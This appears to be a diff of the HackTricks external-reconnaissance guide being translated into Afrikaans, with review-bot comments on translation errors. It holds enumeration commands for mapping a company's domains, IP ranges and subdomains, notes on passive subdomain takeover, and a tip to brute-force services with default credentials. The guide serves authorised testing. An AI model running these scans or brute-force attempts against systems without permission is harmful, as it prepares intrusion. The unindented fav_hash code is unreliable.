* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings te verdien tot **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
## Assets discoveries
## Bate-ontdekkings
> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns.
> So jy is vertel dat alles wat aan 'n maatskappy behoort binne die omvang is, en jy wil uitvind wat hierdie maatskappy eintlik besit.
The goal of this phase is to obtain all the **companies owned by the main company** and then all the **assets** of these companies. To do so, we are going to:
Die doel van hierdie fase is om al die **maatskappye wat deur die hoofmaatskappy besit word** te verkry en dan al die **bates** van hierdie maatskappye. Om dit te doen, gaan ons:
1. Find the acquisitions of the main company, this will give us the companies inside the scope.
2. Find the ASN (if any) of each company, this will give us the IP ranges owned by each company
3. Use reverse whois lookups to search for other entries (organisation names, domains...) related to the first one (this can be done recursively)
4. Use other techniques like shodan `org`and `ssl`filters to search for other assets (the `ssl` trick can be done recursively).
1. Vind die verkrygings van die hoofmaatskappy, dit sal ons die maatskappye binne die omvang gee.
2. Vind die ASN (indien enige) van elke maatskappy, dit sal ons die IP-reeks besit deur elke maatskappy gee.
3. Gebruik omgekeerde whois-opsoek na ander inskrywings (organisasienames, domeine...) wat verband hou met die eerste een (dit kan rekursief gedoen word).
4. Gebruik ander tegnieke soos shodan `org`en `ssl`filters om na ander bates te soek (die `ssl`-truk kan rekursief gedoen word).
### **Acquisitions**
### **Verkrygings**
First of all, we need to know which **other companies are owned by the main company**.\
One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.\
Other option is to visit the **Wikipedia** page of the main company and search for **acquisitions**.
Eerstens moet ons weet watter **ander maatskappye deur die hoofmaatskappy besit word**.\
Een opsie is om [https://www.crunchbase.com/](https://www.crunchbase.com) te besoek, **soek** vir die **hoofmaatskappy**, en **klik** op "**verkrygings**". Daar sal jy ander maatskappye sien wat deur die hoofmaatskappy verkry is.\
'n Ander opsie is om die **Wikipedia**-bladsy van die hoofmaatskappy te besoek en te soek na **verkrygings**.
> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets.
> Ok, op hierdie punt behoort jy al die maatskappye binne die omvang te ken. Kom ons vind uit hoe om hul bates te vind.
### **ASNs**
An autonomous system number (**ASN**) is a **unique number** assigned to an **autonomous system** (AS) by the **Internet Assigned Numbers Authority (IANA)**.\
An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators.
It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs.\
You can **search** by company **name**, by **IP** or by **domain** in [**https://bgp.he.net/**](https://bgp.he.net)**.**\
**Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net) **(Africa),** [**Arin**](https://www.arin.net/about/welcome/region/)**(North America),** [**APNIC**](https://www.apnic.net) **(Asia),** [**LACNIC**](https://www.lacnic.net) **(Latin America),** [**RIPE NCC**](https://www.ripe.net) **(Europe). Anyway, probably all the** useful information **(IP ranges and Whois)** appears already in the first link.
'n Autonome stelselnommer (**ASN**) is 'n **unieke nommer** wat toegewys word aan 'n **autonome stelsel** (AS) deur die **Internet Assigned Numbers Authority (IANA)**.\
'n **AS** bestaan uit **blokke** van **IP-adresse** wat 'n duidelik gedefinieerde beleid het vir toegang tot eksterne netwerke en deur 'n enkele organisasie geadministreer word, maar uit verskeie operateurs kan bestaan.
Dit is interessant om uit te vind of die **maatskappy enige ASN toegewys het** om sy **IP-reeks** te vind. Dit sal interessant wees om 'n **kwesbaarheidstoets** uit te voer teen al die **gasheer** binne die **omvang** en te soek na domeine binne hierdie IP's.\
Jy kan **soek** op maatskappy **naam**, op **IP** of op **domein** in [**https://bgp.he.net/**](https://bgp.he.net)**.**\
**Afhanklik van die streek van die maatskappy kan hierdie skakels nuttig wees om meer data in te samel:** [**AFRINIC**](https://www.afrinic.net) **(Afrika),** [**Arin**](https://www.arin.net/about/welcome/region/)**(Noord-Amerika),** [**APNIC**](https://www.apnic.net) **(Asië),** [**LACNIC**](https://www.lacnic.net) **(Latyns-Amerika),** [**RIPE NCC**](https://www.ripe.net) **(Europa). In elk geval verskyn waarskynlik alle** nuttige inligting **(IP-reeks en Whois)** reeds in die eerste skakel.
```bash
#You can try "automate" this with amass, but it's not very recommended
amass intel -org tesla
amass intel -asn 8911,50313,394161
```
Also, [**BBOT**](https://github.com/blacklanternsecurity/bbot)**'s** subdomain enumeration automatically aggregates and summarizes ASNs at the end of the scan.
Verder, [**BBOT**](https://github.com/blacklanternsecurity/bbot) se subdomeinversameling aggregeer en som die ASNs outomaties op aan die einde van die skandering.
```bash
bbot -t tesla.com -f subdomain-enum
...
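Review bot: several translated lines are word-for-word calques that read wrong in Afrikaans: 'die IP-reeks besit deur elke maatskappy' should be 'die IP-reekse wat deur elke maatskappy besit word'; ''n Autonome stelselnommer' should be ''n Outonome stelselnommer'; 'teen al die gasheer binne die omvang' needs the plural ('gashere' or 'gasheerstelsels'). The missing spaces in 'shodan `org`en `ssl`filters' are copied from the English line; fix them on both sides. The footer list in this file ('hacktruuks', 'NFTs') also disagrees with the previous file's rendering of the same block.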
@ -71,62 +68,59 @@ bbot -t tesla.com -f subdomain-enum
[INFO] bbot.modules.asn: +----------+---------------------+--------------+----------------+----------------------------+-----------+
```
Jy kan die IP-reeks van 'n organisasie vind deur [http://asnlookup.com/](http://asnlookup.com) te gebruik (dit het 'n gratis API).\
Jy kan die IP en ASN van 'n domein vind deur [http://ipv4info.com/](http://ipv4info.com) te gebruik.
You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com) (it has free API).\
You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com).
### **Op soek na kwesbaarhede**
### **Looking for vulnerabilities**
Op hierdie punt weet ons **al die bates binne die omvang**, so as jy toegelaat word, kan jy 'n **kwesbaarheidsskander** (Nessus, OpenVAS) oor al die gasheerstelsels uitvoer.\
Jy kan ook 'n paar [**poortskanderings**](../pentesting-network/#discovering-hosts-from-the-outside) **uitvoer of dienste soos** shodan **gebruik om oop poorte te vind en, afhangende van wat jy vind, moet jy in hierdie boek kyk hoe om verskeie moontlike dienste te pentest.\
**Dit is ook die moeite werd om te vermeld dat jy ook 'n paar** standaard gebruikersnaam **en** wagwoorde **lyste kan voorberei en probeer om dienste te** bruteforce met [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS) over all the hosts.\
Also, you could launch some [**port scans**](../pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible services running.\
**Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
## Domeine
## Domains
> Ons ken al die maatskappye binne die omvang en hul bates, dit is tyd om die domeine binne die omvang te vind.
> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope.
*Let daarop dat jy in die volgende voorgestelde tegnieke ook subdomeine kan vind en daardie inligting nie onderskat moet word nie.*
_Please, note that in the following purposed techniques you can also find subdomains and that information shouldn't be underrated._
Eerstens moet jy soek na die **hoofdomein**(e) van elke maatskappy. Byvoorbeeld, vir _Tesla Inc._ gaan dit _tesla.com_ wees.
First of all you should look for the **main domain**(s) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_.
### **Reverse DNS**
As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server (1.1.1.1, 8.8.8.8)
### **Omgekeerde DNS**
Nadat jy al die IP-reeks van die domeine gevind het, kan jy probeer om **omgekeerde DNS-opsoekings** op daardie **IP's uit te voer om meer domeine binne die omvang te vind**. Probeer om 'n DNS-bediener van die slagoffer of 'n bekende DNS-bediener (1.1.1.1, 8.8.8.8) te gebruik.
```bash
dnsrecon -r <DNS Range> -n <IP_DNS> #DNS reverse of all of the addresses
dnsrecon -d facebook.com -r 157.240.221.35/24 #Using facebooks dns
dnsrecon -r 157.240.221.35/24 -n 1.1.1.1 #Using cloudflares dns
dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns
```
Vir hierdie om te werk, moet die administrateur die PTR handmatig aktiveer.\
Jy kan ook 'n aanlyn hulpmiddel gebruik vir hierdie inligting: [http://ptrarchive.com/](http://ptrarchive.com)
For this to work, the administrator has to enable manually the PTR.\
You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com)
### **Omgekeerde Whois (lus)**
### **Reverse Whois (loop)**
Binne 'n **whois** kan jy baie interessante **inligting** vind soos **organisasienaam**, **adres**, **e-posse**, telefoonnommers... Maar wat nog interessanter is, is dat jy **meer bates wat verband hou met die maatskappy** kan vind as jy **omgekeerde whois-opsoekings deur enige van daardie velde** uitvoer (byvoorbeeld ander whois-registre waar dieselfde e-pos verskyn).\
Jy kan aanlyn hulpmiddels soos die volgende gebruik:
Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** (for example other whois registries where the same email appears).\
You can use online tools like:
* [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Gratis**
* [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Gratis**
* [https://www.reversewhois.io/](https://www.reversewhois.io) - **Gratis**
* [https://www.whoxy.com/](https://www.whoxy.com) - **Gratis** web, nie gratis API nie.
* [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com) - Nie gratis nie
* [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Nie gratis (slegs **100 gratis** soektogte)
* [https://www.domainiq.com/](https://www.domainiq.com) - Nie gratis nie
* [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Free**
* [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Free**
* [https://www.reversewhois.io/](https://www.reversewhois.io) - **Free**
* [https://www.whoxy.com/](https://www.whoxy.com) - **Free** web, not free API.
* [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com) - Not free
* [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Not Free (only **100 free** searches)
* [https://www.domainiq.com/](https://www.domainiq.com) - Not Free
Jy kan hierdie taak outomatiseer deur [**DomLink** ](https://github.com/vysecurity/DomLink)(vereis 'n whoxy API-sleutel) te gebruik.\
Jy kan ook 'n paar outomatiese omgekeerde whois-ontdekkings doen met [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois`
You can automate this task using [**DomLink** ](https://github.com/vysecurity/DomLink)(requires a whoxy API key).\
You can also perform some automatic reverse whois discovery with [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois`
**Let daarop dat jy hierdie tegniek kan gebruik om meer domeinname te ontdek elke keer as jy 'n nuwe domein vind.**
**Note that you can use this technique to discover more domain names every time you find a new domain.**
### **Opvolgers**
### **Trackers**
As jy dieselfde ID van dieselfde opvolger op 2 verskillende bladsye vind, kan jy aanneem dat **beide bladsye** deur dieselfde span **bestuur word**.\
Byvoorbeeld, as jy dieselfde **Google Analytics ID** of dieselfde **Adsense ID** op verskeie bladsye sien.
If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.\
For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages.
There are some pages and tools that let you search by these trackers and more:
Daar is 'n paar bladsye en hulpmiddels wat jou in staat stel om daardeur te soek en meer:
* [**Udon**](https://github.com/dhn/udon)
* [**BuiltWith**](https://builtwith.com)
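Review bot: '### **Opvolgers**' mistranslates 'Trackers' ('opvolger' means successor); in the web-analytics sense keep 'Trackers' or use 'spoorsnyers', and the sentence 'Daar is 'n paar bladsye en hulpmiddels wat jou in staat stel om daardeur te soek en meer' has lost 'by these trackers'. Other fixes in this hunk: 'kwesbaarheidsskander' should be 'kwesbaarheidsskandeerder'; 'Vir hierdie om te werk' is a calque for 'Om dit te laat werk'; the whoisxmlapi entry 'Nie gratis (slegs **100 gratis** soektogte)' is missing its closing 'nie'. The English typo 'You can fins the IP and ASN' is silently corrected in the translation; correct the English line as well.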
@ -136,106 +130,92 @@ There are some pages and tools that let you search by these trackers and more:
### **Favicon**
Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Here’s how to use it:
Het jy geweet dat ons verwante domeine en subdomeine aan ons teiken kan vind deur te soek na dieselfde favicon-ikoonhash? Dit is presies wat die [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) hulpmiddel, gemaak deur [@m4ll0k2](https://twitter.com/m4ll0k2), doen. Hier is hoe om dit te gebruik:
```bash
cat my_targets.txt | xargs -I %% bash -c 'echo "http://%%/favicon.ico"' > targets.txt
python3 favihash.py -f https://target/favicon.ico -t targets.txt -s
```
![favihash - ontdek domeine met dieselfde favicon-ikoon-hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg)
![favihash - discover domains with the same favicon icon hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg)
Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target.
Moreover, you can also search technologies using the favicon hash as explained in [**this blog post**](https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139). That means that if you know the **hash of the favicon of a vulnerable version of a web tech** you can search if in shodan and **find more vulnerable places**:
Eenvoudig gestel, favihash sal ons in staat stel om domeine te ontdek wat dieselfde favicon-ikoon-hash as ons teiken het.
Verder kan jy ook tegnologieë soek deur die favicon-hash te gebruik soos verduidelik in [**hierdie blogpos**](https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139). Dit beteken dat as jy die **hash van die favicon van 'n kwesbare weergawe van 'n webtegnologie** ken, kan jy soek of dit in shodan is en **meer kwesbare plekke vind**:
```bash
shodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,port --separator " " | awk '{print $1":"$2}'
```
This is how you can **calculate the favicon hash** of a web:
Dit is hoe jy die **favicon-hash kan bereken** van 'n webwerf:
```python
import mmh3
import requests
import codecs
def fav_hash(url):
response = requests.get(url)
favicon = codecs.encode(response.content,"base64")
fhash = mmh3.hash(favicon)
|
||||
print(f"{url} : {fhash}")
|
||||
return fhash
|
||||
response = requests.get(url)
|
||||
favicon = codecs.encode(response.content,"base64")
|
||||
fhash = mmh3.hash(favicon)
|
||||
print(f"{url} : {fhash}")
|
||||
return fhash
|
||||
```
|
||||
### **Auteursreg / Unieke string**
|
||||
|
||||
### **Copyright / Uniq string**
|
||||
Soek binne die webbladsye na **strings wat gedeel kan word oor verskillende webwerwe in dieselfde organisasie**. Die **auteursreg string** kan 'n goeie voorbeeld wees. Soek dan vir daardie string in **Google**, in ander **blaaierprogramme** of selfs in **Shodan**: `shodan search http.html:"Auteursreg string"`
|
||||
|
||||
Search inside the web pages **strings that could be shared across different webs in the same organisation**. The **copyright string** could be a good example. Then search for that string in **google**, in other **browsers** or even in **shodan**: `shodan search http.html:"Copyright string"`
|
||||
|
||||
### **CRT Time**
|
||||
|
||||
It's common to have a cron job such as
|
||||
### **CRT-tyd**
|
||||
|
||||
Dit is algemeen om 'n cron-taak te hê soos
|
||||
```bash
|
||||
# /etc/crontab
|
||||
37 13 */10 * * certbot renew --post-hook "systemctl reload nginx"
|
||||
```
|
||||
### **Passiewe Oorname**
|
||||
|
||||
to renew the all the domain certificates on the server. This means that even if the CA used for this doesn't set the time it was generated in the Validity time, it's possible to **find domains belonging to the same company in the certificate transparency logs**.\
|
||||
Check out this [**writeup for more information**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/).
|
||||
Dit is blykbaar algemeen vir mense om subdomeine toe te ken aan IP-adresse wat aan wolkverskaffers behoort en op 'n stadium daardie IP-adres te verloor, maar vergeet om die DNS-rekord te verwyder. Daarom sal die skep van 'n VM in 'n wolk (soos Digital Ocean) jou eintlik die beheer oor sommige subdomeine gee.
|
||||
|
||||
### **Passive Takeover**
|
||||
[**Hierdie berig**](https://kmsec.uk/blog/passive-takeover/) verduidelik 'n storie daaroor en stel 'n skripsie voor wat 'n VM in DigitalOcean skep, die IPv4 van die nuwe masjien kry, en in Virustotal soek na subdomeinrekords wat daarna verwys.
|
||||
|
||||
Apparently is common for people to assign subdomains to IPs that belongs to cloud providers and at some point **lose that IP address but forget about removing the DNS record**. Therefore, just **spawning a VM** in a cloud (like Digital Ocean) you will be actually **taking over some subdomains(s)**.
|
||||
### **Ander maniere**
|
||||
|
||||
[**This post**](https://kmsec.uk/blog/passive-takeover/) explains a store about it and propose a script that **spawns a VM in DigitalOcean**, **gets** the **IPv4** of the new machine, and **searches in Virustotal for subdomain records** pointing to it.
|
||||
|
||||
### **Other ways**
|
||||
|
||||
**Note that you can use this technique to discover more domain names every time you find a new domain.**
|
||||
**Let daarop dat jy hierdie tegniek kan gebruik om meer domeinname te ontdek elke keer as jy 'n nuwe domein vind.**
|
||||
|
||||
**Shodan**
|
||||
|
||||
As you already know the name of the organisation owning the IP space. You can search by that data in shodan using: `org:"Tesla, Inc."` Check the found hosts for new unexpected domains in the TLS certificate.
|
||||
Aangesien jy reeds die naam van die organisasie wat die IP-ruimte besit, ken, kan jy daarna soek in Shodan deur die volgende te gebruik: `org:"Tesla, Inc."` Kyk na die gevonde gasheer vir nuwe onverwagte domeine in die TLS-sertifikaat.
|
||||
|
||||
You could access the **TLS certificate** of the main web page, obtain the **Organisation name** and then search for that name inside the **TLS certificates** of all the web pages known by **shodan** with the filter : `ssl:"Tesla Motors"` or use a tool like [**sslsearch**](https://github.com/HarshVaragiya/sslsearch).
|
||||
Jy kan toegang verkry tot die **TLS-sertifikaat** van die hoofwebblad, die **Organisasienaam** verkry en dan soek na daardie naam binne die **TLS-sertifikate** van al die webbladsye wat bekend is by **Shodan** met die filter: `ssl:"Tesla Motors"` of gebruik 'n hulpmiddel soos [**sslsearch**](https://github.com/HarshVaragiya/sslsearch).
|
||||
|
||||
**Assetfinder**
|
||||
|
||||
[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing.
|
||||
[**Assetfinder**](https://github.com/tomnomnom/assetfinder) is 'n hulpmiddel wat soek na **verwante domeine** van 'n hoofdomein en **subdomeine** daarvan, baie indrukwekkend.
|
||||
|
||||
### **Looking for vulnerabilities**
|
||||
### **Soek na kwesbaarhede**
|
||||
|
||||
Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it (if cheap enough) and let know the company.
|
||||
Kyk vir 'n [domein-oorgawe](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Dalk gebruik 'n maatskappy 'n domein, maar het hulle die eienaarskap verloor. Registreer dit net (as dit goedkoop genoeg is) en laat die maatskappy weet.
|
||||
|
||||
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
|
||||
_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
|
||||
As jy enige **domein met 'n ander IP** as diegene wat jy reeds in die bate-ontdekking gevind het, vind, moet jy 'n **basiese kwesbaarheidsskandering** (met behulp van Nessus of OpenVAS) en 'n [**poortskenning**](../pentesting-network/#discovering-hosts-from-the-outside) met **nmap/masscan/shodan** uitvoer. Afhangende van watter dienste besig is, kan jy in **hierdie boek 'n paar truuks vind om hulle te "aanval"**.\
|
||||
Merk op dat die domein soms gehuisves word binne 'n IP wat nie deur die kliënt beheer word nie, so dit val buite die bestek, wees versigtig.
|
||||
|
||||
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
**Bug bounty wenk**: **Teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers vir hackers geskep is**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
## Subdomains
|
||||
## Subdomeine
|
||||
|
||||
> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies.
|
||||
> Ons ken al die maatskappye binne die bestek, al die bates van elke maatskappy en al die domeine wat verband hou met die maatskappye.
|
||||
|
||||
It's time to find all the possible subdomains of each found domain.
|
||||
Dit is tyd om al die moontlike subdomeine van elke gevonde domein te vind.
|
||||
|
||||
### **DNS**
|
||||
|
||||
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it).
|
||||
|
||||
Laten ons probeer om **subdomeine** uit die **DNS**-rekords te kry. Ons moet ook probeer vir **Zone Transfer** (As dit kwesbaar is, moet jy dit rapporteer).
|
||||
```bash
|
||||
dnsrecon -a -d tesla.com
|
||||
```
|
||||
|
||||
### **OSINT**
|
||||
|
||||
The fastest way to obtain a lot of subdomains is search in external sources. The most used **tools** are the following ones (for better results configure the API keys):
|
||||
Die vinnigste manier om 'n groot aantal subdomeine te verkry, is om in eksterne bronne te soek. Die mees gebruikte **hulpmiddels** is die volgende (stel die API-sleutels vir beter resultate):
|
||||
|
||||
* [**BBOT**](https://github.com/blacklanternsecurity/bbot)
|
||||
|
||||
```bash
|
||||
# subdomains
|
||||
bbot -t tesla.com -f subdomain-enum
|
||||
|
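Review bot: the translated text drops the paragraph that explains the CRT Time technique. In the original, the crontab example is followed by `to renew the all the domain certificates on the server. This means that even if the CA used for this doesn't set the time it was generated in the Validity time, it's possible to **find domains belonging to the same company in the certificate transparency logs**` and the link to the swarm.ptsecurity.com writeup; on the new side the `### **CRT-tyd**` section ends at the closing fence of the crontab block and jumps straight to `### **Passiewe Oorname**`, so the cron example no longer explains anything. Please restore both lines in Afrikaans. Two smaller points: `shodan search http.html:"Auteursreg string"` translates the placeholder inside a command, which only works if readers recognise it as a placeholder; keeping the code as `shodan search http.html:"Copyright string"` avoids the ambiguity. And every line of the body of `def fav_hash(url):` (`response = requests.get(url)` through `return fhash`) appears once on each side with identical text, so the change there can only be whitespace; if the new side lost the four-space indentation, as the rendering suggests, the function no longer parses in Python, so please diff with whitespace visible before merging.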
@ -246,108 +226,80 @@ bbot -t tesla.com -f subdomain-enum -rf passive
|
|||
# subdomains + port scan + web screenshots
|
||||
bbot -t tesla.com -f subdomain-enum -m naabu gowitness -n my_scan -o .
|
||||
```
|
||||
|
||||
* [**Amass**](https://github.com/OWASP/Amass)
|
||||
|
||||
```bash
|
||||
amass enum [-active] [-ip] -d tesla.com
|
||||
amass enum -d tesla.com | grep tesla.com # To just list subdomains
|
||||
```
|
||||
|
||||
* [**subfinder**](https://github.com/projectdiscovery/subfinder)
|
||||
|
||||
```bash
|
||||
# Subfinder, use -silent to only have subdomains in the output
|
||||
./subfinder-linux-amd64 -d tesla.com [-silent]
|
||||
```
|
||||
|
||||
* [**findomain**](https://github.com/Edu4rdSHL/findomain/)
|
||||
|
||||
```bash
|
||||
# findomain, use -silent to only have subdomains in the output
|
||||
./findomain-linux -t tesla.com [--quiet]
|
||||
```
|
||||
|
||||
* [**OneForAll**](https://github.com/shmilylty/OneForAll/tree/master/docs/en-us)
|
||||
|
||||
* [**OneForAll**](https://github.com/shmilylty/OneForAll/tree/master/docs/af-za)
|
||||
```bash
|
||||
python3 oneforall.py --target tesla.com [--dns False] [--req False] [--brute False] run
|
||||
```
|
||||
|
||||
* [**assetfinder**](https://github.com/tomnomnom/assetfinder)
|
||||
|
||||
```bash
|
||||
assetfinder --subs-only <domain>
|
||||
```
|
||||
|
||||
* [**Sudomy**](https://github.com/Screetsec/Sudomy)
|
||||
|
||||
```bash
|
||||
# It requires that you create a sudomy.api file with API keys
|
||||
sudomy -d tesla.com
|
||||
```
|
||||
|
||||
* [**vita**](https://github.com/junnlikestea/vita)
|
||||
|
||||
```
|
||||
vita -d tesla.com
|
||||
```
|
||||
|
||||
* [**theHarvester**](https://github.com/laramies/theHarvester)
|
||||
|
||||
```bash
|
||||
theHarvester -d tesla.com -b "anubis, baidu, bing, binaryedge, bingapi, bufferoverun, censys, certspotter, crtsh, dnsdumpster, duckduckgo, fullhunt, github-code, google, hackertarget, hunter, intelx, linkedin, linkedin_links, n45ht, omnisint, otx, pentesttools, projectdiscovery, qwant, rapiddns, rocketreach, securityTrails, spyse, sublist3r, threatcrowd, threatminer, trello, twitter, urlscan, virustotal, yahoo, zoomeye"
|
||||
```
|
||||
Daar is **ander interessante gereedskap/API's** wat, alhoewel nie direk gespesialiseer is in die vind van subdomeine nie, nuttig kan wees om subdomeine te vind, soos:
|
||||
|
||||
There are **other interesting tools/APIs** that even if not directly specialised in finding subdomains could be useful to find subdomains, like:
|
||||
|
||||
* [**Crobat**](https://github.com/cgboal/sonarsearch)**:** Uses the API [https://sonar.omnisint.io](https://sonar.omnisint.io) to obtain subdomains
|
||||
|
||||
* [**Crobat**](https://github.com/cgboal/sonarsearch)**:** Gebruik die API [https://sonar.omnisint.io](https://sonar.omnisint.io) om subdomeine te verkry.
|
||||
```bash
|
||||
# Get list of subdomains in output from the API
|
||||
## This is the API the crobat tool will use
|
||||
curl https://sonar.omnisint.io/subdomains/tesla.com | jq -r ".[]"
|
||||
```
|
||||
|
||||
* [**JLDC free API**](https://jldc.me/anubis/subdomains/google.com)
|
||||
|
||||
* [**JLDC gratis API**](https://jldc.me/anubis/subdomains/google.com)
|
||||
```bash
|
||||
curl https://jldc.me/anubis/subdomains/tesla.com | jq -r ".[]"
|
||||
```
|
||||
|
||||
* [**RapidDNS**](https://rapiddns.io) free API
|
||||
|
||||
* [**RapidDNS**](https://rapiddns.io) gratis API
|
||||
```bash
|
||||
# Get Domains from rapiddns free API
|
||||
rapiddns(){
|
||||
curl -s "https://rapiddns.io/subdomain/$1?full=1" \
|
||||
| grep -oE "[\.a-zA-Z0-9-]+\.$1" \
|
||||
| sort -u
|
||||
curl -s "https://rapiddns.io/subdomain/$1?full=1" \
|
||||
| grep -oE "[\.a-zA-Z0-9-]+\.$1" \
|
||||
| sort -u
|
||||
}
|
||||
rapiddns tesla.com
|
||||
```
|
||||
|
||||
* [**https://crt.sh/**](https://crt.sh)
|
||||
|
||||
```bash
|
||||
# Get Domains from crt free API
|
||||
crt(){
|
||||
curl -s "https://crt.sh/?q=%25.$1" \
|
||||
| grep -oE "[\.a-zA-Z0-9-]+\.$1" \
|
||||
| sort -u
|
||||
curl -s "https://crt.sh/?q=%25.$1" \
|
||||
| grep -oE "[\.a-zA-Z0-9-]+\.$1" \
|
||||
| sort -u
|
||||
}
|
||||
crt tesla.com
|
||||
```
|
||||
|
||||
* [**gau**](https://github.com/lc/gau)**:** fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain.
|
||||
|
||||
* [**gau**](https://github.com/lc/gau)**:** haal bekende URL's op van AlienVault se Open Threat Exchange, die Wayback Machine, en Common Crawl vir enige gegewe domein.
|
||||
```bash
|
||||
# Get subdomains from GAUs found URLs
|
||||
gau --subs tesla.com | cut -d "/" -f 3 | sort -u
|
||||
```
|
||||
|
||||
* [**SubDomainizer**](https://github.com/nsonaniya2010/SubDomainizer) **&** [**subscraper**](https://github.com/Cillian-Collins/subscraper): They scrap the web looking for JS files and extract subdomains from there.
|
||||
|
||||
* [**SubDomainizer**](https://github.com/nsonaniya2010/SubDomainizer) **&** [**subscraper**](https://github.com/Cillian-Collins/subscraper): Hulle skraap die web op soek na JS-lêers en onttrek subdomeine daaruit.
|
||||
```bash
|
||||
# Get only subdomains from SubDomainizer
|
||||
python3 SubDomainizer.py -u https://tesla.com | grep tesla.com
|
||||
|
